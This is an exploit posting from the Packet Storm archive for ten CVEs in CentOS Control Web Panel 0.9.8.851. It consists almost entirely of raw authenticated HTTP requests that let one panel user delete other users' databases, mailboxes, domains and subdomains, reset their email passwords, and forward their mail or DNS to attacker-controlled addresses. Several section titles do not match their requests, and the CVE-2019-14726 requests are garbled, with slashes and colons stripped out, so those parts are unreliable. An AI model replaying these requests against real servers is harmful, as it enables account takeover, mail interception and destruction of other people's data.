what you don't know can hurt you

Control Web Panel 0.9.8.851 Privilege Escalation

Control Web Panel 0.9.8.851 Privilege Escalation
Posted Sep 9, 2019
Authored by Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

Control Web Panel version 0.9.8.851 suffers from multiple privilege escalation vulnerabilities.

tags | exploit, web, vulnerability
advisories | CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730
MD5 | 6f60d66e3e8d2b75a2b81b0d30d6bc25

Control Web Panel 0.9.8.851 Privilege Escalation

Change Mirror Download
CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    29 Files
  • 28
    Jan 28th
    22 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close